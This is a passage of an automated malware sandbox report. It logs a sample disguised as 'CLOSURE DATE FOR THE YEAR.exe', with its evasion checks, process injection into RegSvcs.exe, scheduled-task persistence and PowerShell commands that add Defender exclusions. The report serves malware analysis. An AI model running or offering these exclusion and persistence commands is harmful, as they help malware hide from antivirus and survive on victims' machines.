                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: CLOSURE DATE FOR THE YEAR.exe PID: 7480, type: MEMORYSTR
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeMemory allocated: 790000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeMemory allocated: 24D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeMemory allocated: 2320000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeMemory allocated: 4A60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeMemory allocated: 5A60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeMemory allocated: 5B90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeMemory allocated: 6B90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeMemory allocated: 9890000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeMemory allocated: A890000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeMemory allocated: AD20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeMemory allocated: BD20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeMemory allocated: D10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeMemory allocated: 27D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeMemory allocated: D10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeMemory allocated: 4DF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeMemory allocated: 5DF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeMemory allocated: 5F20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeMemory allocated: 6F20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeMemory allocated: 97E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeMemory allocated: 9130000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeMemory allocated: A7E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4619Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 538Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6097Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 528Jump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe TID: 7500Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep count: 4619 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8028Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7824Thread sleep count: 538 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8040Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8016Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,8_2_00403D74
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 60000Jump to behavior
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1753742773.0000000000817000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1753742773.0000000000817000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: IOsbBBIDAm.exe, 00000009.00000002.2072636364.0000000007D71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                Source: RegSvcs.exe, 00000008.00000002.2903142728.0000000001258000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040317B mov eax, dword ptr fs:[00000030h]8_2_0040317B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00402B7C GetProcessHeap,RtlAllocateHeap,8_2_00402B7C
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe"
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe"
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe"Jump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 415000Jump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41A000Jump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 4A0000Jump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 10FC008Jump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe"Jump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpB774.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpDA2F.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
